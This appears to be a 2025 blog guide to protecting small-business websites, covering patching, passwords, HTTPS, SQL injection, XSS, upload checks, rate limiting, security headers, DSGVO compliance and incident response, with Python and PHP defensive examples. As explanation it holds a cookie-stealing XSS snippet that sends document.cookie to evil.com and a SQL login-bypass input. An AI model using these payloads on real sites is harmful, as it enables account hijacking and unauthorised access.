Web Security

Website Security 2025: How to Protect Your Website from Hackers and Data Leaks

Every day, 30,000 websites are hacked. This complete security guide shows how to protect your website, your customer data and your reputation.

Raphael Lugmayr
13 October 2025
11 min read


30,000 websites get hacked every day.

Not big corporations. Small businesses. Medical practices. Online shops. Restaurants.

"Why would anyone hack MY website?" Famous last words before you wake up to a defaced homepage, stolen customer data, and a €20,000 DSGVO fine.

Here's the brutal truth: Hackers don't target you specifically. They run automated bots that scan millions of sites looking for vulnerabilities. If you're not protected, you WILL get hit.

Let me show you exactly how to protect your website, your customers, and your business.

Why Website Security Is Critical in 2025

The Alarming Numbers

Cyber Crime Statistics:

  • 30,000 websites hacked daily
  • 43% of cyber attacks target small businesses
  • 60% of small businesses close within 6 months after a breach
  • Average cost of data breach: €150,000-500,000
  • DSGVO fines: up to €20 million or 4% of revenue

What hackers want:

  • Customer data (sell on dark web)
  • Credit card info (obvious)
  • Email addresses (spam/phishing)
  • Server resources (crypto mining, botnet)
  • SEO hijacking (inject spam links)
  • Ransomware (pay to get site back)

Real Impact:

Example 1: Online shop

Breach: Customer credit cards stolen
Result:
- €50,000 in chargebacks
- €80,000 DSGVO fine
- Lost reputation
- Business closed

Example 2: Medical practice

Breach: Patient data leaked
Result:
- €30,000 DSGVO fine
- Lawsuits from patients
- Lost trust
- 40% revenue drop

Yeah. Security isn't optional.

The Most Common Security Vulnerabilities

1. Outdated Software

The Problem:

  • Outdated WordPress: 90% of hacked sites
  • Old plugins: #1 entry point
  • Outdated PHP: known vulnerabilities

Why it happens:

  • "If it works, don't update"
  • Fear of breaking site
  • Lazy maintenance
  • No automatic updates

The Fix:

```text
# Check versions
WordPress: Should be latest (currently 6.4+)
PHP:       Should be 8.1+ (not 7.x!)
Plugins:   Update within 48h of release
```

```php
// Enable auto-updates (WordPress) in wp-config.php
define('WP_AUTO_UPDATE_CORE', true);
define('AUTOMATIC_UPDATER_DISABLED', false);
```

2. Weak Passwords

Common passwords (still!):

1. 123456
2. password
3. 123456789
4. admin
5. qwerty

If your password is on this list, you deserve to get hacked.

Strong Password Rules:

  • Minimum 16 characters
  • Mix: uppercase, lowercase, numbers, symbols
  • No dictionary words
  • No personal info
  • Unique per site

Example Strong Password:

Weak: admin123
Strong: K9$mPx#vL2@nQ8wR4tY

Better: Use Password Manager:

  • 1Password (€3/month)
  • Bitwarden (Free)
  • LastPass (€3/month)

Generate 20+ character random passwords. You'll never remember them. That's the point.

3. No SSL/HTTPS

HTTP vs HTTPS:

HTTP = Data sent in plain text (anyone can read)
HTTPS = Data encrypted (secure)

Why SSL matters:

  • Google ranks HTTPS higher
  • Browsers show "Not Secure" warning
  • Customer trust destroyed
  • Required for payments
  • DSGVO compliance

How to get SSL:

Free: Let's Encrypt (most hosts include this)
Paid: €50-200/year (not necessary for most)

Check if active:
https://www.ssllabs.com/ssltest/

Force HTTPS redirect:

```apache
# .htaccess
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
```

4. SQL Injection

What it is: Attackers inject malicious code into database queries.

Example Attack:

```sql
-- Normal login:
SELECT * FROM users WHERE username='admin' AND password='pass123'

-- Injection attack: username = admin'--
SELECT * FROM users WHERE username='admin'--' AND password='pass123'
-- Everything after -- is ignored = logged in!
```

How to prevent:

1. Prepared Statements (PHP):

```php
// ❌ VULNERABLE: user input is concatenated into the query
$query = "SELECT * FROM users WHERE id = " . $_GET['id'];

// ✅ SAFE: the value is bound as a parameter, never parsed as SQL
$stmt = $pdo->prepare("SELECT * FROM users WHERE id = ?");
$stmt->execute([$_GET['id']]);
```

2. Input Validation:

```php
// Validate user input: only a plain integer is accepted
$id = filter_var($_GET['id'], FILTER_VALIDATE_INT);
if ($id === false) {
    die("Invalid input");
}
```

3. Escape Output:

```php
// Escape data before it is written into HTML
echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');
```
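The login bypass above and both PHP fixes (prepared statement, integer validation), reworked as a runnable Python/sqlite3 example. This is added here and is not code from the original post; the in-memory users table and its credentials are constructed for the demo.

```python
import re
import sqlite3

def make_demo_db():
    """Constructed in-memory users table (plaintext password only to mirror the
    page's example; real applications store password hashes, never passwords)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', 'pass123')")
    con.commit()
    return con

def login_vulnerable(con, username, password):
    """Builds the query by string concatenation, like the '❌ VULNERABLE' PHP line."""
    sql = (f"SELECT id FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    # With username = "admin'--" the query becomes
    #   SELECT id FROM users WHERE username='admin'--' AND password='...'
    # and everything after -- is a comment: the password check disappears.
    return con.execute(sql).fetchone() is not None

def login_safe(con, username, password):
    """Prepared statement: the driver binds the values as data, so quotes and
    comment markers inside them can never change the query's structure."""
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone() is not None

def validate_int(value):
    """Counterpart of filter_var($_GET['id'], FILTER_VALIDATE_INT): returns the
    integer, or None when the input is anything other than a plain integer."""
    s = str(value).strip()
    return int(s) if re.fullmatch(r"-?\d+", s) else None
```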

5. Cross-Site Scripting (XSS)

What it is: Injecting malicious JavaScript into pages.

Example Attack:

```html
<!-- User submits this as a comment: -->
<script>
  fetch('https://evil.com/steal?cookie=' + document.cookie)
</script>
<!-- Now the attacker has the session cookie = account hijacked -->
```

How to prevent:

1. Escape all user input:

```php
// Before displaying user content
echo htmlspecialchars($comment, ENT_QUOTES, 'UTF-8');
```

2. Content Security Policy (CSP):

```php
// header.php
header("Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' https://trusted-cdn.com");
```

3. Validate input:

```javascript
// Only allow expected characters
const sanitized = input.replace(/[^a-zA-Z0-9]/g, '');
```

6. File Upload Vulnerabilities

The Attack:

1. Attacker uploads malicious PHP file disguised as image
2. File saved to /uploads/evil.php
3. Attacker visits yoursite.com/uploads/evil.php
4. Malicious code executes
5. Site owned

How to prevent:

1. Validate file type (not just extension):

```php
$allowed = ['image/jpeg', 'image/png', 'image/gif'];
// finfo inspects the file content (magic bytes), not the client-supplied name
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$mime = finfo_file($finfo, $_FILES['upload']['tmp_name']);
if (!in_array($mime, $allowed, true)) {
    die('Invalid file type');
}
```

2. Rename uploaded files:

```php
// Derive the extension from the validated MIME type ($mime from the check above),
// never from the client-supplied name: an image with a .php name must not stay .php
$extensions = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
$newName = bin2hex(random_bytes(16)) . '.' . $extensions[$mime];
move_uploaded_file($_FILES['upload']['tmp_name'], "/uploads/$newName");
```

3. Store outside web root:

❌ /public/uploads/ (accessible)
✅ /storage/uploads/ (not directly accessible)
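The three upload rules together (content check by magic bytes, random name with the extension taken from the detected type, storage outside the web root) as an added Python example; it is not code from the original post, and the allow-list of signatures and the storage directory are constructed.

```python
import os
import secrets

# Magic bytes of the image types the upload form accepts (constructed allow-list)
SIGNATURES = {
    b"\xff\xd8\xff": ("image/jpeg", "jpg"),
    b"\x89PNG\r\n\x1a\n": ("image/png", "png"),
    b"GIF87a": ("image/gif", "gif"),
    b"GIF89a": ("image/gif", "gif"),
}

def detect_image_type(data):
    """Return (mime, extension) from the file's leading bytes, or None if it is
    not an allowed image. Like finfo_file(): the content decides, not the name."""
    for magic, result in SIGNATURES.items():
        if data.startswith(magic):
            return result
    return None

def safe_upload_name(data, client_filename):
    """Validate the content, then build a random filename whose extension comes
    from the detected type. client_filename is deliberately ignored: a file
    named evil.php that starts with a JPEG header is stored as <random>.jpg,
    so the web server never treats it as a script."""
    detected = detect_image_type(data)
    if detected is None:
        raise ValueError(f"Invalid file type for upload {client_filename!r}")
    _mime, ext = detected
    return f"{secrets.token_hex(16)}.{ext}"

def store_upload(data, client_filename, storage_dir):
    """Write the file under storage_dir (outside the web root, e.g. /storage/uploads/)
    and return its path; serve it later through a script, never by direct URL."""
    name = safe_upload_name(data, client_filename)
    path = os.path.join(storage_dir, name)
    with open(path, "wb") as fh:
        fh.write(data)
    return path
```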

7. Brute Force Attacks

What it is: Automated login attempts with common passwords.

Example:

Login attempt 1: admin / 123456 ❌
Login attempt 2: admin / password ❌
Login attempt 3: admin / admin123 ❌
...
Login attempt 847: admin / MyP@ssw0rd! ✅

How to prevent:

1. Limit login attempts:

```php
// After 5 failed attempts, block for 30 minutes.
// get_failed_attempts() is a placeholder for your own lookup (database, cache, etc.).
$attempts = get_failed_attempts($ip);
if ($attempts >= 5) {
    die('Too many failed attempts. Try again in 30 minutes.');
}
```

2. Use CAPTCHA:

```html
<!-- Google reCAPTCHA -->
<script src="https://www.google.com/recaptcha/api.js"></script>
<div class="g-recaptcha" data-sitekey="your-key"></div>
```

3. Two-Factor Authentication (2FA):

  • Google Authenticator
  • SMS codes
  • Email codes

WordPress plugins:

  • Wordfence Security (free)
  • iThemes Security (free)
  • Sucuri Security (free)
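The "5 failed attempts, 30 minute block" rule above, implemented end to end as an added Python example (not code from the original post): a tracker with a sliding window of failures, a lockout that expires, and a login wrapper that checks the lockout before the password. The key, thresholds and injectable clock are assumptions for the demo.

```python
import time
from collections import defaultdict

MAX_ATTEMPTS = 5             # failures allowed before the lockout
WINDOW_SECONDS = 30 * 60     # failures older than this no longer count
LOCKOUT_SECONDS = 30 * 60    # how long the key stays blocked

class LoginThrottle:
    """Failed-login tracker keyed by IP (or better, IP + username, so one shared
    NAT address does not lock out everyone). The clock is injectable so the
    lockout can be tested without waiting 30 minutes."""

    def __init__(self, clock=time.time):
        self.clock = clock
        self.failures = defaultdict(list)  # key -> timestamps of recent failures
        self.locked_until = {}             # key -> time the lockout expires

    def is_locked(self, key):
        until = self.locked_until.get(key)
        if until is None:
            return False
        if self.clock() >= until:          # lockout expired: start with a clean slate
            del self.locked_until[key]
            self.failures[key].clear()
            return False
        return True

    def record_failure(self, key):
        now = self.clock()
        recent = [t for t in self.failures[key] if now - t < WINDOW_SECONDS]
        recent.append(now)
        self.failures[key] = recent
        if len(recent) >= MAX_ATTEMPTS:
            self.locked_until[key] = now + LOCKOUT_SECONDS
        return len(recent)

    def record_success(self, key):
        self.failures[key].clear()
        self.locked_until.pop(key, None)

def attempt_login(throttle, key, credentials_ok):
    """Return 'locked', 'ok' or 'failed'. The lockout is checked before the
    password, so a blocked client learns nothing about the credentials."""
    if throttle.is_locked(key):
        return "locked"
    if credentials_ok():
        throttle.record_success(key)
        return "ok"
    throttle.record_failure(key)
    return "failed"
```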

8. DDoS Attacks

What it is: Overwhelming your server with fake traffic until it crashes.

Example:

Normal: 1,000 visitors/day
DDoS: 100,000 requests/second from botnet
Result: Server crashes, site down

How to prevent:

1. Use CDN with DDoS protection:

  • Cloudflare (Free plan includes basic protection)
  • AWS CloudFront
  • Akamai (enterprise)

2. Rate limiting:

```nginx
# Nginx config: define the zone in the http block ...
limit_req_zone $binary_remote_addr zone=one:10m rate=1r/s;
# ... and apply it inside a location block, e.g. the login endpoint
limit_req zone=one burst=5 nodelay;
```

3. Fail2Ban:

```bash
# Blocks IPs after repeated failed requests
sudo apt-get install fail2ban
```

Security Best Practices

1. SSL/TLS Configuration

Minimum Requirements:

  • TLS 1.2+ only (disable TLS 1.0/1.1)
  • Strong cipher suites
  • HSTS enabled
  • Certificate from trusted CA

Test your SSL:

https://www.ssllabs.com/ssltest/
Goal: A+ rating

HSTS Header:

```php
header('Strict-Transport-Security: max-age=31536000; includeSubDomains; preload');
```

2. Security Headers

Add these to every page:

```php
// Prevent clickjacking
header('X-Frame-Options: SAMEORIGIN');

// XSS Protection (legacy header; current browsers ignore it, the CSP below is what counts)
header('X-XSS-Protection: 1; mode=block');

// Content Type sniffing
header('X-Content-Type-Options: nosniff');

// Referrer Policy
header('Referrer-Policy: strict-origin-when-cross-origin');

// Content Security Policy
header("Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' https://trusted.cdn.com");
```

Test headers:

https://securityheaders.com/
Goal: A rating
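An offline version of the header check, run over the exact header set from this section plus the HSTS header above. This is an added Python example, not code from the original post; the check list and the sample response are constructed, and X-XSS-Protection is not scored because current browsers ignore it.

```python
import re

# Headers the page adds, with what their absence means (constructed check list)
REQUIRED = {
    "strict-transport-security": "HSTS missing: browsers may still connect over plain HTTP",
    "x-frame-options": "X-Frame-Options missing: page can be framed (clickjacking)",
    "x-content-type-options": "X-Content-Type-Options missing: MIME sniffing allowed",
    "referrer-policy": "Referrer-Policy missing: full URLs leak to third parties",
    "content-security-policy": "CSP missing: no restriction on script sources",
}

def script_sources(csp):
    """Sources that govern scripts: script-src, or default-src when script-src is absent."""
    table = {}
    for directive in csp.split(";"):
        parts = directive.split()
        if parts:
            table[parts[0].lower()] = parts[1:]
    return table.get("script-src", table.get("default-src", []))

def audit_headers(headers):
    """headers: response header name -> value (any case). Returns a list of
    findings; an empty list means every check passed."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = [msg for name, msg in REQUIRED.items() if name not in h]
    hsts = h.get("strict-transport-security")
    if hsts is not None:
        m = re.search(r"max-age=(\d+)", hsts)
        if not m or int(m.group(1)) < 31536000:
            findings.append("HSTS max-age below one year")
    if "'unsafe-inline'" in script_sources(h.get("content-security-policy", "")):
        findings.append("CSP allows 'unsafe-inline' scripts: injected inline <script> still runs")
    if h.get("x-frame-options", "SAMEORIGIN").upper() not in ("DENY", "SAMEORIGIN"):
        findings.append("X-Frame-Options value not recognised by browsers")
    return findings

# Constructed response: the header set from this section plus the HSTS header above
PAGE_HEADERS = {
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains; preload",
    "X-Frame-Options": "SAMEORIGIN",
    "X-XSS-Protection": "1; mode=block",
    "X-Content-Type-Options": "nosniff",
    "Referrer-Policy": "strict-origin-when-cross-origin",
    "Content-Security-Policy": "default-src 'self'; script-src 'self' 'unsafe-inline' https://trusted.cdn.com",
}
```

The one finding on the page's own header set is the 'unsafe-inline' in script-src: it lets exactly the injected inline script from the XSS section run, so replace it with nonces or hashes once the inline scripts are moved out.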

3. Database Security

Best Practices:

1. Separate database user per application:

```sql
-- Don't use root!
CREATE USER 'website_user'@'localhost' IDENTIFIED BY 'strong_password_here';
GRANT SELECT, INSERT, UPDATE, DELETE ON website_db.* TO 'website_user'@'localhost';
```

2. Disable remote access:

```ini
# my.cnf
bind-address = 127.0.0.1
```

3. Regular backups:

```bash
# Daily automated backup
mysqldump -u root -p database_name > backup-$(date +%Y%m%d).sql
```

4. Encrypted connections:

```php
$pdo = new PDO(
    'mysql:host=localhost;dbname=db',
    'user',
    'pass',
    [PDO::MYSQL_ATTR_SSL_CA => '/path/to/ca-cert.pem']
);
```

4. File Permissions

Correct permissions:

```bash
# Directories
chmod 755 /var/www/html/

# Files
chmod 644 /var/www/html/index.php

# Sensitive config
chmod 600 /var/www/html/wp-config.php

# Never 777!
```

Why 777 is dangerous:

777 = Everyone can read, write, execute
= Hacker can upload malicious file
= Site compromised

5. Backup Strategy

3-2-1 Rule:

  • 3 copies of data
  • 2 different storage types
  • 1 off-site copy

What to backup:

  • Database (daily)
  • Files/uploads (weekly)
  • Configuration files (weekly)
  • Email (monthly)

Backup Tools:

Manual:

```bash
# Database
mysqldump -u user -p database > backup.sql

# Files
tar -czf backup.tar.gz /var/www/html/
```

Automated:

  • UpdraftPlus (WordPress)
  • Acronis
  • Backblaze (€6/month)
  • AWS S3 + Glacier

Test restores! Backup is useless if you can't restore.

6. Monitoring & Alerts

What to monitor:

  • Failed login attempts
  • File changes
  • Malware scans
  • Uptime
  • SSL certificate expiry
  • Security updates

Tools:

Free:

  • Wordfence (WordPress)
  • Sucuri SiteCheck
  • Google Search Console
  • Uptime Robot

Paid:

  • Sucuri Security ($200/year)
  • SiteLock ($100-500/year)
  • Cloudflare (free-$200/month)

Set up alerts:

- Email on failed login (5+ attempts)
- SMS on site down
- Slack notification on file changes
- Weekly security reports

DSGVO & Privacy

Must-Haves for DSGVO Compliance

1. SSL/HTTPS

Encrypted data transmission = required

2. Privacy Policy

Must include:
- What data you collect
- Why you collect it
- How long you store it
- How users can delete it
- Who has access

3. Cookie Consent

Required for:
- Analytics cookies
- Marketing cookies
- Third-party cookies

Not required for:
- Essential cookies (session, security)

Cookie Banner Best Practices:

Use a consent management platform:

  • Cookiebot (9/month)
  • OneTrust
  • Complianz (WordPress)

Requirements:

  • Clear "Accept" button
  • Clear "Reject" button (not buried!)
  • Granular choices (Analytics, Marketing, etc.)
  • Easy to revoke consent

4. Data Processing Agreement (if you use tools):

Google Analytics → Need DPA
Mailchimp → Need DPA
Hosting Provider → Need DPA
Payment Processor → Need DPA

5. User Rights:

Users must be able to:
- Access their data
- Export their data
- Delete their data
- Object to processing

Implementation:

```text
// Delete user data endpoint
POST /api/user/delete
Authorization: Bearer {token}

// Export user data
GET /api/user/export
Response: JSON with all user data
```

Avoiding DSGVO Fines

Common violations:

€20,000 Fine:

  • No privacy policy
  • No cookie consent
  • No SSL for forms

€50,000+ Fine:

  • Data breach not reported (72h!)
  • Selling user data without consent
  • No data processing agreements

€20M or 4% revenue:

  • Major data breach with negligence
  • Systematic violations
  • Refusing to comply

How to stay compliant:

✅ SSL everywhere
✅ Privacy policy (updated!)
✅ Cookie consent
✅ Data processing agreements
✅ Regular security audits
✅ Incident response plan
✅ Data retention policy
✅ User data export/delete

WordPress-Specific Security

Must-Have Plugins:

1. Wordfence Security (Free)

Features:
- Firewall
- Malware scanner
- Login security
- 2FA
- Real-time threat defense

2. iThemes Security (Free)

Features:
- Brute force protection
- File change detection
- 404 monitoring
- Strong password enforcement

3. Sucuri Security (Free + Paid)

Features:
- Security scanner
- Malware removal
- Firewall (paid)
- DDoS protection (paid)

WordPress Hardening:

1. Change default admin username:

```sql
UPDATE wp_users SET user_login = 'new_admin' WHERE user_login = 'admin';
```

2. Disable file editing:

```php
// wp-config.php
define('DISALLOW_FILE_EDIT', true);
```

3. Hide WordPress version:

```php
// functions.php
remove_action('wp_head', 'wp_generator');
```

4. Disable XML-RPC:

```apache
# .htaccess
<Files xmlrpc.php>
    # Apache 2.2 syntax (on Apache 2.4 without mod_access_compat use: Require all denied)
    Order Deny,Allow
    Deny from all
</Files>
```

5. Limit login attempts:

Plugin: Limit Login Attempts Reloaded
Settings: 3 attempts, 20 minute lockout

6. Change database prefix:

```php
// wp-config.php
$table_prefix = 'xyz_'; // Not 'wp_'
```

Incident Response Plan

If your site gets hacked:

Phase 1: Contain (First Hour)

1. Take site offline:

```html
<!-- maintenance.html -->
<h1>Scheduled Maintenance</h1>
<p>We'll be back in 1 hour</p>
```

2. Assess damage:

- What was compromised?
- Customer data leaked?
- Files modified?
- Database accessed?

3. Notify relevant parties:

- Hosting provider (immediately)
- DSGVO authority (within 72 hours!)
- Affected customers (be transparent)

Phase 2: Clean (Hours 2-24)

1. Scan for malware:

Use multiple scanners:

  • Wordfence
  • Sucuri SiteCheck
  • Manual file review

2. Review access logs:

```bash
# Check who accessed what
tail -n 1000 /var/log/apache2/access.log | grep "POST"
```
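The grep above shows every POST; during an incident the question is which clients hammered the login endpoints and whether one of them eventually got in. This added Python example (not code from the original post) parses Apache combined-format lines and ranks IPs by login POSTs; the sample log is constructed from documentation IP ranges, and the endpoint list and threshold are assumptions.

```python
import re
from collections import Counter

# Apache "combined" log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Endpoints that automated login bots hammer on WordPress sites (assumed list)
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def login_post_counts(lines):
    """Count POST requests to login endpoints per client IP (query strings ignored)."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?", 1)[0] in LOGIN_PATHS:
            counts[rec["ip"]] += 1
    return counts

def suspicious_ips(lines, threshold=5):
    """IPs at or above `threshold` login POSTs, most active first. Review these
    first: a 302 (successful WordPress login) from one of them after a run of
    200s means that account's password must be rotated."""
    return [(ip, n) for ip, n in login_post_counts(lines).most_common() if n >= threshold]

# Constructed sample log using documentation IP ranges, not a real server's log
SAMPLE_LOG = """\
203.0.113.7 - - [13/Oct/2025:02:14:01 +0200] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "python-requests/2.31"
203.0.113.7 - - [13/Oct/2025:02:14:02 +0200] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "python-requests/2.31"
203.0.113.7 - - [13/Oct/2025:02:14:03 +0200] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "python-requests/2.31"
203.0.113.7 - - [13/Oct/2025:02:14:04 +0200] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "python-requests/2.31"
203.0.113.7 - - [13/Oct/2025:02:14:05 +0200] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "python-requests/2.31"
203.0.113.7 - - [13/Oct/2025:02:14:06 +0200] "POST /wp-login.php?redirect_to=%2Fwp-admin HTTP/1.1" 302 0 "-" "python-requests/2.31"
198.51.100.2 - - [13/Oct/2025:02:15:10 +0200] "GET /index.php HTTP/1.1" 200 8122 "-" "Mozilla/5.0"
198.51.100.2 - - [13/Oct/2025:02:15:40 +0200] "POST /wp-login.php HTTP/1.1" 302 0 "https://example.com/wp-login.php" "Mozilla/5.0"
this line is not in combined log format
""".splitlines()
```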

3. Restore from clean backup:

```bash
# Only if you have a confirmed clean backup
mysql -u user -p database < clean_backup.sql
```

4. Update everything:

- WordPress core
- All plugins
- All themes
- PHP version
- SSL certificate

5. Change all passwords:

- Admin accounts
- FTP/SFTP
- Database
- Hosting control panel
- Email accounts

Phase 3: Prevent (Days 2-7)

1. Security audit:

- How did they get in?
- What vulnerabilities exist?
- What else needs fixing?

2. Implement fixes:

- Patch vulnerabilities
- Add security headers
- Enable 2FA
- Set up monitoring

3. Monitor closely:

- Daily malware scans
- Watch access logs
- Check for suspicious activity

4. Document incident:

- What happened
- How it was resolved
- What was learned
- How to prevent next time

Security Checklist

Basics (Everyone):

  • ✅ SSL/HTTPS active
  • ✅ Strong passwords (16+ characters)
  • ✅ Software up-to-date
  • ✅ Backups (automated, tested)
  • ✅ Security plugin installed (WordPress)
  • ✅ Spam protection (forms)
  • ✅ DSGVO-compliant (cookie banner, privacy policy)

Intermediate:

  • ✅ 2FA enabled
  • ✅ Firewall (WAF) active
  • ✅ Malware scanner
  • ✅ Security headers configured
  • ✅ Failed login monitoring
  • ✅ File integrity monitoring
  • ✅ Database backups (daily)

Advanced:

  • ✅ Penetration testing (yearly)
  • ✅ Security audit (quarterly)
  • ✅ Intrusion detection
  • ✅ DDoS protection
  • ✅ Incident response plan
  • ✅ Security training (team)
  • ✅ Bug bounty program

Security Tools & Resources


Conclusion: Security Is Not a Project but a Process

Here's the reality:

One-time security setup = false sense of security

Security requires:

  • Regular updates (weekly)
  • Monitoring (daily)
  • Backups (automated)
  • Audits (quarterly)
  • Education (ongoing)

Cost of Prevention vs. Cost of Breach:

Prevention: €50-200/month

  • Security tools
  • Monitoring
  • Backups
  • Updates

Data Breach: €50,000-500,000+

  • DSGVO fines
  • Lost revenue
  • Reputation damage
  • Legal fees
  • Business closure

Yeah. Prevention is way cheaper.

Don't wait until you get hacked. By then it's too late.



Raphael Lugmayr

Founder & CEO at Stoicera. Specialised in modern web development with Next.js, React and TypeScript. Passion for clean code and UX-optimised solutions.
